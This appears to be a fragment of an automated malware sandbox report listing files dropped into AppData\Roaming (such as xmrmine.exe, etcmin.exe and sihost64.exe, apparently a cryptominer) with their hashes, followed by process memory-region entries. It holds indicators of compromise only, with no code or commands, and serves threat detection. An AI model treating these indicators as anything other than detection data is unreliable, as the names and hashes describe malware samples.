SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\appdata\roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
\Users\Admin\AppData\Roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
\Users\Admin\AppData\Roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
memory/540-114-0x0000000002080000-0x0000000002082000-memory.dmpFilesize
8KB
-
memory/540-103-0x0000000000000000-mapping.dmp
-
memory/540-108-0x000000013FAE0000-0x000000013FAE1000-memory.dmpFilesize
4KB
-
memory/856-123-0x00000000002C0000-0x00000000002E0000-memory.dmpFilesize
128KB
-
memory/856-119-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/856-120-0x00000001402EB66C-mapping.dmp
-
memory/856-125-0x00000000002E0000-0x0000000000300000-memory.dmpFilesize
128KB
-
memory/856-124-0x00000000002C0000-0x00000000002E0000-memory.dmpFilesize
128KB
-
memory/856-121-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/856-122-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/920-75-0x0000000000000000-mapping.dmp
-
memory/932-77-0x0000000000000000-mapping.dmp
-
memory/1152-95-0x0000000000000000-mapping.dmp
-
memory/1296-79-0x000000001C810000-0x000000001C812000-memory.dmpFilesize
8KB
-
memory/1296-73-0x0000000000850000-0x0000000000856000-memory.dmpFilesize
24KB
-
memory/1296-69-0x000000013F2F0000-0x000000013F2F1000-memory.dmpFilesize
4KB
-
memory/1296-65-0x0000000000000000-mapping.dmp
-
memory/1480-78-0x0000000000000000-mapping.dmp
-
memory/1536-111-0x00000000022B0000-0x00000000022B2000-memory.dmpFilesize
8KB
-
memory/1536-89-0x000000013F780000-0x000000013F781000-memory.dmpFilesize
4KB
-
memory/1536-84-0x0000000000000000-mapping.dmp
-
memory/1672-60-0x0000000075971000-0x0000000075973000-memory.dmpFilesize
8KB
-
memory/1712-100-0x0000000000000000-mapping.dmp
-
memory/1712-107-0x000000013F250000-0x000000013F251000-memory.dmpFilesize
4KB
-
memory/1712-113-0x000000001BDA0000-0x000000001BDA2000-memory.dmpFilesize
8KB
-
memory/1756-98-0x0000000000000000-mapping.dmp
-
memory/1812-80-0x00000000008B0000-0x00000000008B2000-memory.dmpFilesize
8KB
-
memory/1812-62-0x0000000000000000-mapping.dmp
-
memory/1812-70-0x000000013FA00000-0x000000013FA01000-memory.dmpFilesize
4KB
-
memory/1812-74-0x0000000000860000-0x0000000000869000-memory.dmpFilesize
36KB
-
memory/1864-97-0x0000000000000000-mapping.dmp
-
memory/1876-83-0x0000000000000000-mapping.dmp
-
memory/1876-90-0x000000013F780000-0x000000013F781000-memory.dmpFilesize
4KB
-
memory/1876-112-0x000000001CA50000-0x000000001CA52000-memory.dmpFilesize
8KB
-
memory/1888-76-0x0000000000000000-mapping.dmp
-
memory/1980-96-0x0000000000000000-mapping.dmp